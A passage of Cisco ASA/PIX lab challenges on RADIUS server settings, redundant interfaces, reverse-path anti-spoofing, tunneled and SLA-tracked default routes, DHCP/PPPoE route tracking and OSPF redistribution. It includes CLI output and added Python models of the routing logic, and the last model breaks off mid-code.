exit                 Exit from aaa-server host configuration mode
help                 Help for AAA server configuration commands
key                  Specify the secret used to authenticate the NAS to the AAA server
no                   Remove an item from aaa-server host configuration
radius-common-pw     Specify a common password for all RADIUS authorization transactions
retry-interval       Specify the amount of time between retry attempts
timeout              Specify the maximum time to wait for response from configured server
(config-aaa-server-host)# accounting-port ?
aaa-server-host mode commands/options:
<0-65535> Enter port number (0 - 65535)
(config-aaa-server-host)# acl-netmask-convert ?
aaa-server-host mode commands/options:
auto-detect  Enter this keyword to specify auto-detect netmask
standard     Enter this keyword to specify standard netmask
wildcard     Enter this keyword to specify wildcard netmask
(config-aaa-server-host)# key ?
aaa-server-host mode commands/options:
WORD < 129 char Enter an alphanumeric string up to 128 characters
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# radius-common-pw ?
aaa-server-host mode commands/options:
WORD < 128 char Enter an alphanumeric string up to 127 characters
(config-aaa-server-host)# retry-interval ?
aaa-server-host mode commands/options:
<1-10> Number of seconds (1 - 10)
(config-aaa-server-host)# timeout ?
aaa-server-host mode commands/options:
<1-300> Number of seconds (1 - 300)
(config-aaa-server-host)# authentication-port 1645
(config-aaa-server-host)# accounting-port 1646
(config-aaa-server-host)# retry-interval 10

Ports 1645/1646 are the original RADIUS ports; RFC 2865 moved the service to 1812/1813 and
most current servers listen there, so match whatever the server actually uses. The key is the
RADIUS shared secret and must be identical on both ends. It never crosses the wire, but it is
the only thing protecting the User-Password attribute and authenticating the server's
replies, so use a long random value rather than a word like testkey.

Cisco ASA/PIX Challenge 100


Title: Interface-level Redundancy
Outline
The ASA device supports interface redundancy, where interfaces can be defined with the
same firewall functionality (inside, outside, and so on), and thus connect to the same
network. One of the interfaces can thus be active while the other goes into a standby mode.
If the active interface goes down, then the standby interface will take its place.
The redundant interface is a logical interface made up of a pair of physical interfaces, one
active and one standby, and the ASA supports up to eight redundant interface pairs.
Note: PIX/ASA 8.x only
Objectives
The objectives of this challenge are to:

Enable Ethernet interfaces.
Define the redundancy interface.
Define name and IP details for the redundant interface.
Define the interfaces for membership of the redundant interface.
Show the active device, and standby (using the show redundant command).

Commands
# show version
(config)# int e0
(config-if)# no nameif
(config-if)# no shutdown
(config-if)# no ip address
(config-if)# no ip security-level
(config-if)# exit
(config)# int e1
(config-if)# no nameif
(config-if)# no shutdown
(config-if)# no ip address
(config-if)# no ip security-level
(config-if)# exit
(config)# int redundant 1
(config-if)# nameif inside
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# member-interface e0
(config-if)# member-interface e1
(config-if)# no shutdown
(config-if)# exit
(config)# exit

# show interface redundant 1

Example
# show version
Cisco PIX Security Appliance Software Version 7.0(1)
Device Manager Version 5.0(1)
Compiled on Thu 31-Mar-05 14:37 by builders
System image file is "flash:/image.bin"
Config file at boot was "startup-config"
pixfirewall up 10 mins 40 secs
Hardware:
PIX-515E, 96 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff00000, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
0: Ext: Ethernet0 : media index 0: irq 10
1: Ext: Ethernet1 : media index 1: irq 11
2: Ext: Ethernet2 : media index 2: irq 11

Licensed features for this platform:
Maximum Physical Interfaces : 3
Maximum VLANs : 10
Inside Hosts : Unlimited
Failover : Disabled
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
URL Filtering : Enabled
Security Contexts : 0
GTP/GPRS : Disabled
VPN Peers : Unlimited

This platform has a Restricted (R) license.


Serial Number: 807290112
Running Activation Key: 0x3f43a2b7 0xf5909081 0x5fd21d2b 0x16cbcc59
Configuration last modified by enable_15 at 15:42:06.949 UTC Thu Dec 28 2006
(config)# int e0
(config-if)# no nameif
(config-if)# no shutdown
(config-if)# no ip address
(config-if)# no ip security-level
(config-if)# exit
(config)# int e1
(config-if)# no nameif
(config-if)# no shutdown
(config-if)# no ip address
(config-if)# no ip security-level
(config-if)# exit
(config)# int redundant 1
(config-if)# nameif inside
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# member-interface e0
(config-if)# member-interface e1
(config-if)# no shutdown
(config-if)# exit
(config)# exit

# show interface redundant 1


Interface Redundant1 inside is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.0.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets
Redundancy Information:
Member e0 (active), e1
Last switchover at 00:00:00 GMT Jun 1 2008

After the redundant interface is defined, there should be no changes to the interfaces
involved, apart from setting the duplex and speed settings, which are inherited by the
redundant interface. A great strength of interface redundancy is that it responds within 0.5s,
which is faster than failover.
To change the active interface to e1, the following command is used:
# redundant-interface redundant1 active-member e1

Cisco ASA/PIX Challenge 101


Title: Routing Information to Prevent IP Address Spoofing
Outline
With Reverse Path Forwarding (RPF), the firewall detects spoofed source addresses, as it
examines the source of every data packet which arrives at a specific interface. It then tries to
find a reverse path back to the source. If it cannot find one, it rejects the packet (and a
log message is stored).
Objectives
The objectives of this challenge are to:

Enable Ethernet interfaces.
Define RPF on an interface.
Display RPF statistics.

Commands
# show version
# config t
(config)# int e0
(config-if)# nameif outside
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# int e1
(config-if)# nameif inside
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 100
(config-if)# exit
(config)# ip verify reverse-path interface inside
(config)# ip verify reverse-path interface outside
(config)# exit
# show ip verify statistics

Example
# show version
# config t
(config)# int e0
(config-if)# nameif outside
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# int e1
(config-if)# nameif inside
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 100
(config-if)# exit
(config)# ip verify ?
configure mode commands/options:
reverse-path Keyword to indicate Reverse-Path Filtering
(config)# ip verify reverse-path ?
configure mode commands/options:
interface Keyword to apply RPF on an interface
(config)# ip verify reverse-path interface ?
configure mode commands/options:
Current available interface(s):
Inf2 Name of interface Ethernet2
Inside Name of interface Ethernet1
Outside Name of interface Ethernet0
(config)# ip verify reverse-path interface inside
(config)# ip verify reverse-path interface outside
# sh ip ?
address Show IP addresses, DHCP leases
audit Show ip audit statistics
local Show ip local pool information
verify Show Reverse Path Verify (RPF) statistics
| Output modifiers
<cr>
# sh ip verify ?
statistics Show Reverse Path Verify (RPF) statistics
# sh ip verify statistics
interface outside: 100 unicast rpf drops
interface inside: 300 unicast rpf drops
interface inf: 43 unicast rpf drops

Cisco ASA/PIX Challenge 102


Title: Default route for tunneled traffic
Outline
The PIX/ASA devices can have multiple default routes, each with a different cost. They can also
have a separate default route for tunneled traffic: non-encrypted traffic without a static route
goes via the normal default gateway, while encrypted traffic without a static route goes via the
tunneled gateway.
Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 interface details.
Define a default gateway for non-encrypted traffic. A default metric (1) is used for
the distance metric.
Define a default gateway for encrypted traffic.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# route Glasgow 0 0 192.168.0.1
(config)# route Glasgow 0 0 192.168.0.2
(config)# route Glasgow 0 0 192.168.0.3 tunneled

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# route ?
configure mode commands/options:
Current available interface(s):
Inf2 Name of interface Ethernet2
Inside Name of interface Ethernet1
Glasgow Name of interface Ethernet0
(config)# route Glasgow ?
configure mode commands/options:
Hostname or A.B.C.D The foreign network for this route, 0 means default
(config)# route Glasgow 0 ?
configure mode commands/options:
A.B.C.D The netmask for the destined foreign network
(config)# route Glasgow 0 0 ?
configure mode commands/options:
Hostname or A.B.C.D The address of the gateway by which the foreign network
is reached.
(config)# route Glasgow 0 0 192.168.0.1
(config)# route Glasgow 0 0 192.168.0.2
(config)# route Glasgow 0 0 192.168.0.3 ?
configure mode commands/options:
<1-255> Distance metric for this route, default is 1
tunneled Enable the default tunnel gateway option, metric is set to 255
<cr>
(config)# route Glasgow 0 0 192.168.0.3 tunneled
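As an added example (not part of the NetworkSims material), the following Python model shows the two routing behaviours described in Challenges 101 and 102 together: a longest-prefix lookup that prefers the lower metric among equal default routes and falls back to the tunneled default gateway only for traffic that arrived through a VPN tunnel, and a reverse-path check that keeps per-interface drop counters like show ip verify statistics. The routing table, the interface names outside/inside and the packets are constructed sample data.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Route:
    network: ipaddress.IPv4Network  # destination; 0.0.0.0/0 is a default route
    gateway: str                    # next hop ("connected" for directly attached)
    interface: str                  # nameif of the egress interface
    metric: int = 1                 # distance metric; the ASA default is 1
    tunneled: bool = False          # 'route ... tunneled' default gateway


class RouteTable:
    """Toy model of the ASA forwarding and uRPF logic, not the real implementation."""

    def __init__(self, routes):
        self.routes = list(routes)
        # per-interface counters, as reported by 'show ip verify statistics'
        self.rpf_drops = defaultdict(int)

    def _matching(self, ip, tunneled):
        return [r for r in self.routes if ip in r.network and r.tunneled == tunneled]

    def lookup(self, dst, from_tunnel=False):
        """Longest-prefix match; equal prefixes are decided by the lower metric.

        Decrypted VPN traffic (from_tunnel=True) that would otherwise use an
        ordinary default route is sent to the tunneled default gateway instead.
        """
        ip = ipaddress.ip_address(dst)
        best = max(self._matching(ip, False),
                   key=lambda r: (r.network.prefixlen, -r.metric), default=None)
        if from_tunnel and (best is None or best.network.prefixlen == 0):
            tunneled = self._matching(ip, True)
            if tunneled:
                return min(tunneled, key=lambda r: r.metric)
        return best

    def rpf_check(self, ingress, src):
        """Reverse-path check for a packet with source 'src' arriving on 'ingress'.

        The route back to the source must leave through the interface the packet
        arrived on; otherwise the packet is dropped and the counter incremented.
        """
        back = self.lookup(src)
        if back is None or back.interface != ingress:
            self.rpf_drops[ingress] += 1
            return False
        return True

    def verify_statistics(self):
        return [f"interface {name}: {n} unicast rpf drops"
                for name, n in sorted(self.rpf_drops.items())]


def build_sample_table():
    """Constructed sample table in the style of the challenges above."""
    net = ipaddress.ip_network
    return RouteTable([
        Route(net("192.168.0.0/24"), "connected", "outside"),
        Route(net("192.168.1.0/24"), "connected", "inside"),
        # two ordinary default routes with different costs (metric 1 wins)
        Route(net("0.0.0.0/0"), "192.168.0.254", "outside", metric=1),
        Route(net("0.0.0.0/0"), "192.168.0.253", "outside", metric=2),
        # 'route outside 0 0 192.168.0.3 tunneled' sets the metric to 255
        Route(net("0.0.0.0/0"), "192.168.0.3", "outside", metric=255, tunneled=True),
    ])


def demo():
    table = build_sample_table()
    results = {
        "legit_inside": table.rpf_check("inside", "192.168.1.10"),
        # source with no route back through 'inside': spoofed, dropped
        "spoofed_on_inside": table.rpf_check("inside", "10.9.9.9"),
        "internet_on_outside": table.rpf_check("outside", "8.8.8.8"),
        # an inside address showing up on the outside interface is dropped
        "inside_addr_on_outside": table.rpf_check("outside", "192.168.1.10"),
        "clear_next_hop": table.lookup("8.8.8.8").gateway,
        "vpn_next_hop": table.lookup("8.8.8.8", from_tunnel=True).gateway,
        # a more specific route still wins for tunneled traffic
        "vpn_to_inside": table.lookup("192.168.1.5", from_tunnel=True).interface,
    }
    for line in table.verify_statistics():
        print(line)
    return results


if __name__ == "__main__":
    print(demo())
```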

Cisco ASA/PIX Challenge 103


Title: Favouring Static Routes with better Reachability
Outline
Normally a static route will stay active, but problems can occur if the path it points to goes
down. The PIX/ASA device can therefore tie a static route to a reachability test, so that if one
route goes down, the other will take over. The SLA (Service Level Agreement) monitor process is
used to monitor an arbitrary target address.
Objectives
The objectives of this challenge are to:

Enable the SLA monitor process (with sla monitor ID).
Define the reachability test (with type echo protocol ipicmpecho IPDEST interface
IFNAME), which sends an ICMP echo request to a target IP address (IPDEST) on a
given interface (IFNAME).
Define optional test parameters, such as frequency of test, number of packets,
request data size, Type-of-service (TOS), timeout and threshold.
Run tests forever (with sla monitor schedule ID life forever now).
Enable reachability tracking (using track TRACKID rtr ID reachability).
Define tracking on a static route (route INTERFACENAME 0 0 IPGATEWAY track
TRACKID).

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# sla monitor 3
(config-sla-monitor)# type echo protocol ipicmpecho 192.168.0.2 interface glasgow
(config-sla-monitor-echo)# frequency 10
(config-sla-monitor-echo)# num-packets 100
(config-sla-monitor-echo)# request-data-size 100
(config-sla-monitor-echo)# tos 10
(config-sla-monitor-echo)# timeout 100
(config-sla-monitor-echo)# threshold 100
(config-sla-monitor-echo)# exit
(config-sla-monitor)# exit
(config)# sla monitor schedule 3 life forever now
(config)# track 1 rtr 3 reachability
(config)# route Glasgow 0 0 192.168.0.2 track 1
(config)# exit
# show track
# show route

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# sla ?
configure mode commands/options:
monitor IP Service Level Agreement Monitor
(config)# sla mon ?
configure mode commands/options:
<1-2147483647> Entry Number
schedule IP SLA Monitor Entry Scheduling
(config)# sla monitor 3
(config-sla-monitor)# type echo protocol ipicmpecho 192.168.0.2 interface glasgow
(config-sla-monitor-echo)# ?
IP SLA Monitor Echo Configuration Commands:
default Set a command to its defaults
exit Exit probe configuration
frequency Frequency of an operation
no Negate a command or set its defaults
num-packets Number of Packets
request-data-size Request data size
threshold Operation threshold in milliseconds
timeout Timeout of an operation
tos Type Of Service
<cr>
(config-sla-monitor-echo)# freq ?
sla-monitor-echo mode commands/options:
<1-604800> Frequency in seconds
(config-sla-monitor-echo)# num ?
sla-monitor-echo mode commands/options:
<1-100> Number of Packets to be transmitted
(config-sla-monitor-echo)# req ?
sla-monitor-echo mode commands/options:
<0-16384> Number of bytes in payload
(config-sla-monitor-echo)# thre ?
sla-monitor-echo mode commands/options:
<0-2147483647> Millisecond threshold value
(config-sla-monitor-echo)# timeout ?
sla-monitor-echo mode commands/options:
<0-604800000> Timeout in milliseconds
(config-sla-monitor-echo)# tos ?
sla-monitor-echo mode commands/options:
<0-255> Type of Service Value
(config-sla-monitor-echo)# frequency 10
(config-sla-monitor-echo)# num-packets 100
(config-sla-monitor-echo)# request-data-size 100
(config-sla-monitor-echo)# tos 10
(config-sla-monitor-echo)# timeout 100
(config-sla-monitor-echo)# threshold 100
(config-sla-monitor-echo)# exit
(config-sla-monitor)# exit
(config)# sla monitor schedule 3 life forever now
(config)# track 1 rtr 3 reachability
(config)# route Glasgow 0 0 192.168.0.2 track 1
(config)# exit
# show track
Track 1
Response Time Reporter 142 reachability
Reachability is UP
3 changes, last change 02:31:36
Latest operation return code: OK
Latest RTT (millisecs) 0
Tracked by:
STATIC-IP-ROUTING 0
# show route
S 0.0.0.0 0.0.0.0 [1/0] via 192.168.0.2, glasgow
C 192.168.0.1 255.255.255.0 is directly connected, glasgow
C 192.168.1.1 255.255.255.0 is directly connected, inside
C 192.168.2.1 255.255.255.0 is directly connected, dmz

In this case the default gateway is at 192.168.0.2, and will be tracked for SLA 3.
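As an added example (not from the NetworkSims material), this Python model ties the pieces of this challenge together: an echo probe with the page's frequency, packet count, timeout and threshold values, a track object that turns the probe's return code into a reachability state and counts changes as show track does, and a static route that is withdrawn while its track is DOWN. The probe results, the untracked backup route and the rule that reachability is UP for both OK and Over threshold are assumptions of the example, labelled in the code.

```python
from dataclasses import dataclass
from statistics import mean
from typing import List, Optional, Tuple


@dataclass
class SlaEcho:
    """Parameters of the 'sla monitor 3 / type echo protocol ipicmpecho' probe above."""
    target: str
    frequency: int = 10        # seconds between operations
    num_packets: int = 100     # echo requests sent per operation
    timeout: int = 100         # ms to wait for each reply
    threshold: int = 100       # ms; an answered but slower operation is "Over threshold"

    def run(self, rtts: List[Optional[int]]) -> Tuple[str, Optional[float]]:
        """Return (return code, RTT) for one operation.

        rtts is a constructed list of per-packet round-trip times in ms, None
        meaning no reply. Simplification made by this example: the operation
        fails only if no packet is answered within the timeout, and its RTT is
        the mean of the answered packets. Note that with timeout == threshold,
        as configured on the page, "Over threshold" can never be reported.
        """
        answered = [r for r in rtts[: self.num_packets] if r is not None and r <= self.timeout]
        if not answered:
            return "Timeout", None
        rtt = mean(answered)
        return ("Over threshold" if rtt > self.threshold else "OK"), rtt


@dataclass
class Track:
    """Models 'track 1 rtr 3 reachability' and the counters shown by 'show track'."""
    track_id: int
    rtr_id: int
    reachability: bool = True
    changes: int = 0
    latest_return_code: str = "OK"
    latest_rtt: float = 0.0

    def update(self, return_code: str, rtt: Optional[float]) -> None:
        # Assumption modelled on the Cisco semantics of 'rtr ... reachability':
        # UP for return codes OK and Over threshold, DOWN for anything else.
        up = return_code in ("OK", "Over threshold")
        if up != self.reachability:
            self.changes += 1
            self.reachability = up
        self.latest_return_code = return_code
        self.latest_rtt = 0.0 if rtt is None else rtt


@dataclass
class StaticRoute:
    interface: str
    gateway: str
    metric: int = 1
    track: Optional[Track] = None   # 'route ... track 1' ties the route to a track

    @property
    def installed(self) -> bool:
        # A tracked route is withdrawn from the routing table while its track is DOWN.
        return self.track is None or self.track.reachability


def active_default_gateway(routes: List[StaticRoute]) -> Optional[str]:
    """The lowest-metric default route that is currently installed."""
    live = [r for r in routes if r.installed]
    return min(live, key=lambda r: r.metric).gateway if live else None


def simulate(rtt_runs):
    """Feed successive constructed probe results through track 1 and record the gateway in use."""
    sla = SlaEcho(target="192.168.0.2")  # page values: frequency 10, 100 packets, timeout/threshold 100
    track = Track(track_id=1, rtr_id=3)
    routes = [
        StaticRoute("glasgow", "192.168.0.2", metric=1, track=track),  # tracked primary (from the page)
        StaticRoute("backup", "192.168.5.1", metric=10),               # constructed untracked fallback
    ]
    chosen = []
    for rtts in rtt_runs:
        track.update(*sla.run(rtts))
        chosen.append(active_default_gateway(routes))
    return chosen, track


if __name__ == "__main__":
    runs = [[20] * 100, [None] * 100, [None] * 90 + [30] * 10]
    gateways, trk = simulate(runs)
    print(gateways, f"{trk.changes} changes, latest {trk.latest_return_code}")
```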

Cisco ASA/PIX Challenge 104


Title: Favouring Static Routes with better Reachability, and using DHCP to track the
default gateway.
Outline
This challenge uses DHCP to track the default route. The device will poll the DHCP server
to determine the default route.
Objectives
The objectives of this challenge are to:

Enable the SLA monitor process (with sla monitor ID).
Define the reachability test (with type echo protocol ipicmpecho IPDEST interface
IFNAME), which sends an ICMP echo request to a target IP address (IPDEST) on a
given interface (IFNAME).
Define optional test parameters, such as frequency of test, number of packets,
request data size, Type-of-service (TOS), timeout and threshold.
Run tests forever (with sla monitor schedule ID life forever now).
Enable reachability tracking (using track TRACKID rtr ID reachability).
Define tracking on a static route (route INTERFACENAME 0 0 IPGATEWAY track
TRACKID).
Enable DHCP tracking.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# dhcp client route track 1
(config-if)# ip address dhcp setroute
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# sla monitor 3
(config-sla-monitor)# type echo protocol ipicmpecho 192.168.0.2 interface glasgow
(config-sla-monitor-echo)# frequency 10
(config-sla-monitor-echo)# num-packets 100
(config-sla-monitor-echo)# request-data-size 100
(config-sla-monitor-echo)# tos 10
(config-sla-monitor-echo)# timeout 100
(config-sla-monitor-echo)# threshold 100
(config-sla-monitor-echo)# exit
(config-sla-monitor)# exit
(config)# sla monitor schedule 3 life forever now
(config)# track 1 rtr 3 reachability
(config)# route Glasgow 0 0 192.168.0.2 track 1
(config)# exit
# show track
# show route

Example
# config t
(config)# int e0
(config-if)# nameif Glasgow
(config-if)# dhcp ?
interface mode commands/options:
client DHCP client configuration
(config-if)# dhcp client ?
interface mode commands/options:
route Options for routes installed by dhcp
update Dynamically update information
(config-if)# dhcp client route ?
interface mode commands/options:
distance Administrative distance for dhcp routes
track Track dhcp routes
(config-if)# dhcp client route track ?
interface mode commands/options:
<1-500> Tracked object number
(config-if)# dhcp client route track 1 ?
interface mode commands/options:
<cr>
(config-if)# dhcp client route track 1
(config-if)# ip ?
interface mode commands/options:
address Configure the ip address and mask for an interface
configure mode commands/options:
audit Configure the Intrusion Detection System
local Define a local pool of IP addresses
verify Configure Unicast Reverse Path Filtering on an interface
(config-if)# ip address ?
interface mode commands/options:
Hostname or A.B.C.D Firewall's network interface address
dhcp Keyword to use DHCP to poll for information. Enables the
DHCP client feature on the specified interface
pppoe Keyword to use PPPoE to poll for information. Enables
the PPPoE client feature on the specified interface
(config-if)# ip address dhcp ?
interface mode commands/options:
setroute Keyword to set the default route using the default gateway
parameter the DHCP server returns
<cr>
(config-if)# ip address dhcp setroute
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# sla monitor 3
(config-sla-monitor)# type echo protocol ipicmpecho 192.168.0.2 interface glasgow
(config-sla-monitor-echo)# frequency 10
(config-sla-monitor-echo)# num-packets 100
(config-sla-monitor-echo)# request-data-size 100
(config-sla-monitor-echo)# tos 10
(config-sla-monitor-echo)# timeout 100
(config-sla-monitor-echo)# threshold 100
(config-sla-monitor-echo)# exit
(config-sla-monitor)# exit
(config)# sla monitor 3 schedule life forever now
(config)# track 1 rtr 3 reachability
(config)# route Glasgow 0 0 192.168.0.2 track 1
(config)# exit
# show track
# show route

Cisco ASA/PIX Challenge 105


Title: Favouring Static Routes with better Reachability, and using PPP over Ethernet
(PPPoE) to track the default gateway.
Outline
This challenge uses PPPoE to track the default route. The device will use PPPoE to
determine the default route.
Objectives
The objectives of this challenge are to:

Enable the SLA monitor process (with sla monitor ID).
Define the reachability test (with type echo protocol ipicmpecho IPDEST interface
IFNAME), which sends an ICMP echo request to a target IP address (IPDEST) on a
given interface (IFNAME).
Define optional test parameters, such as frequency of test, number of packets,
request data size, Type-of-service (TOS), timeout and threshold.
Run tests forever (with sla monitor schedule ID life forever now).
Enable reachability tracking (using track TRACKID rtr ID reachability).
Define tracking on a static route (route INTERFACENAME 0 0 IPGATEWAY track
TRACKID).
Enable PPPoE tracking.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# pppoe client route track 1
(config-if)# ip address pppoe setroute
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# sla monitor 3
(config-sla-monitor)# type echo protocol ipicmpecho 192.168.0.2 interface glasgow
(config-sla-monitor-echo)# frequency 10
(config-sla-monitor-echo)# num-packets 100
(config-sla-monitor-echo)# request-data-size 100
(config-sla-monitor-echo)# tos 10
(config-sla-monitor-echo)# timeout 100
(config-sla-monitor-echo)# threshold 100
(config-sla-monitor-echo)# exit
(config-sla-monitor)# exit
(config)# sla monitor schedule 3 life forever now
(config)# track 1 rtr 3 reachability
(config)# route Glasgow 0 0 192.168.0.2 track 1
(config)# exit
# show track
# show route

Example
# config t
(config)# int e0
(config-if)# nameif Glasgow
(config-if)# pppoe ?
interface mode commands/options:
client PPPoE client configuration
(config-if)# pppoe client ?
interface mode commands/options:
route Options for routes installed by pppoe
secondary Options for backup pppoe interfaces
vpdn Configure VPDN parameters
(config-if)# pppoe client route ?
interface mode commands/options:
distance Administrative distance for pppoe routes
track Track pppoe routes
(config-if)# pppoe client route track ?
interface mode commands/options:
<1-500> Tracked object number
(config-if)# pppoe client route track 1 ?
interface mode commands/options:
<cr>
(config-if)# pppoe client route track 1
(config-if)# ip ?
interface mode commands/options:
address Configure the ip address and mask for an interface
configure mode commands/options:
audit Configure the Intrusion Detection System
local Define a local pool of IP addresses
verify Configure Unicast Reverse Path Filtering on an interface
(config-if)# ip address ?
interface mode commands/options:
Hostname or A.B.C.D Firewall's network interface address
dhcp Keyword to use DHCP to poll for information. Enables the
DHCP client feature on the specified interface
pppoe Keyword to use PPPoE to poll for information. Enables
the PPPoE client feature on the specified interface
(config-if)# ip address pppoe ?
interface mode commands/options:
setroute Keyword to set the default route using the default gateway
parameter the PPPoE server returns
<cr>
(config-if)# ip address pppoe setroute ?
interface mode commands/options:
<cr>
(config-if)# ip address pppoe setroute
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# sla monitor 3
(config-sla-monitor)# type echo protocol ipicmpecho 192.168.0.2 interface glasgow
(config-sla-monitor-echo)# frequency 10
(config-sla-monitor-echo)# num-packets 100
(config-sla-monitor-echo)# request-data-size 100
(config-sla-monitor-echo)# tos 10
(config-sla-monitor-echo)# timeout 100
(config-sla-monitor-echo)# threshold 100
(config-sla-monitor-echo)# exit
(config-sla-monitor)# exit
(config)# sla monitor 3 schedule life forever now
(config)# track 1 rtr 3 reachability
(config)# route Glasgow 0 0 192.168.0.2 track 1
(config)# exit
# show track
# show route

Cisco ASA/PIX Challenge 106


Title: Redistributing Routes in OSPF
Outline
The PIX/ASA can redistribute routes in OSPF using a route-map. OSPF is an excellent
routing method, and uses a link-state algorithm to find the shortest path to every route.
Each routing device maintains the same link-state routing database, for each interface and
all the reachable interfaces. All routing decisions are based on a cost derived from bandwidth or
from route preference, rather than on simple methods, such as hop count (as used in RIP).
Unfortunately OSPF is fairly heavy on CPU utilization. In this example two OSPF processes
are run, and the routes of one process are redistributed into the other through the route-map.

Objectives
The objectives of this challenge are to:

Define a route-map.
Define OSPF routing details.
Redistribute routes using the route-map.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# route-map testing permit
(config-route-map)# match metric 1
(config-route-map)# set metric 5
(config-route-map)# set metric-type type-1
(config-route-map)# set tag 1
(config-route-map)# exit
(config)# router ospf 111
(config-router)# network 192.168.0.0 255.255.255.0 area 0
(config-router)# redistribute ospf 1 route-map testing
(config-router)# exit

Example
(config)# route-map ?
configure mode commands/options:
WORD < 58 char Route map tag
(config)# route-map rtest ?
configure mode commands/options:
<0-65535> Sequence to insert to/delete from existing route-map entry
deny Route map denies set operations
permit Route map permits set operations
<cr>
(config)# route-map testing permit
(config-route-map)# ?
Route Map configuration commands:
exit Exit from route-map configuration mode
help Interactive help for route-map subcommands
match Match values from routing table
no Negate a command
set Set values in destination routing protocol
pixfirewall(config-route-map)# match ?
route-map mode commands/options:
interface Match first hop interface of route
ip Match IP address or next-hop or route-source
metric Match metric of route
route-type Match route-type of route
(config-route-map)# match metric ?
route-map mode commands/options:
<0-4294967295> Metric value
(config-route-map)# match metric 1
(config-route-map)# set ?
route-map mode commands/options:
metric Set metric value for destination routing protocol
metric-type Set type of metric for destination routing protocol
(config-route-map)# set metric- ?
route-map mode commands/options:
type-1 OSPF external type 1 metric
type-2 OSPF external type 2 metric
(config-route-map)# set metric- type-1
(config-route-map)# set metric ?
route-map mode commands/options:
<0-4294967295> Metric value
(config-route-map)# set metric 5
(config)# router ospf 111
(config-router)# redistribute ?
router mode commands/options:
connected Connected
ospf Open Shortest Path First (OSPF)
static Static routes
(config-router)# redistribute ospf 1 ?
router mode commands/options:
match Redistribution of OSPF routes
metric Metric for redistributed routes
metric-type Set OSPF exterior metric type for redistributed routes
route-map Route map reference
subnets Consider subnets for redistribution into OSPF
tag Set tag for routes redistributed into OSPF
<cr>
(config-router)# redistribute ospf 1 route-map ?
router mode commands/options:
WORD Pointer to route-map entries
(config-router)# redistribute ospf 1 route-map rtest ?
router mode commands/options:
match Redistribution of OSPF routes
metric Metric for redistributed routes
metric-type Set OSPF exterior metric type for redistributed routes
subnets Consider subnets for redistribution into OSPF
tag Set tag for routes redistributed into OSPF
<cr>
(config-router)# redistribute ospf 1 route-map rtest
In this case:
(config)# route-map testing permit
(config-route-map)# match metric 1
(config-route-map)# set metric 5
(config-route-map)# set metric-type type-1
(config-route-map)# set tag 1
(config-route-map)# exit
(config)# router ospf 111
(config-router)# network 192.168.0.0 255.255.255.0 area 0
(config-router)# redistribute ospf 1 route-map testing
(config-router)# exit

will redistribute the routes from OSPF process 1 into OSPF process 111, matching only routes with a
metric of 1. The PIX/ASA will then redistribute these with a metric of 5, a Type-1
metric type, and a tag value of 1.
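As an added example (not from the NetworkSims material), this Python model applies the route-map above the way redistribution does: the first matching entry decides, a permit entry rewrites the metric, metric-type and tag, and a route that matches no entry is dropped by the implicit deny at the end of the route-map. The OSPF process 1 routes it is run over are constructed.

```python
from dataclasses import dataclass, replace
from typing import List, Optional


@dataclass(frozen=True)
class OspfRoute:
    prefix: str
    metric: int
    metric_type: int = 2   # OSPF external type; redistributed routes are type-2 unless set otherwise
    tag: int = 0


@dataclass(frozen=True)
class RouteMapEntry:
    """One sequence of a route-map: its action, match clauses and set clauses."""
    action: str                            # "permit" or "deny"
    match_metric: Optional[int] = None     # 'match metric N'; None means match everything
    set_metric: Optional[int] = None       # 'set metric N'
    set_metric_type: Optional[int] = None  # 'set metric-type type-1|type-2'
    set_tag: Optional[int] = None          # 'set tag N'

    def matches(self, route: OspfRoute) -> bool:
        return self.match_metric is None or route.metric == self.match_metric

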